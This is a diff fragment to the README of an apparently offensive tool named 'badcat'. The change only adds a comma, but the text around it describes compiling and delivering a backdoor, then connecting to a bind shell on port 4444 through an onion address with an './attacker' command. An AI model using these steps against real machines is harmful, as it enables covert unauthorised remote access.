yanmarques/badcat/README.md

 Now compile your _backdoor_ and deliver as usual.

-When connecting the attacker toolkit will execute the payload for you, but nothing will really show up.
+When connecting, the attacker toolkit will execute the payload for you, but nothing will really show up.
 Instead you'll be able to connect directly to your shell with using the onion address and the port as `settings.payload.bind_port` 4444 in our example.

 ```bash
 $ ./attacker -f hosts.json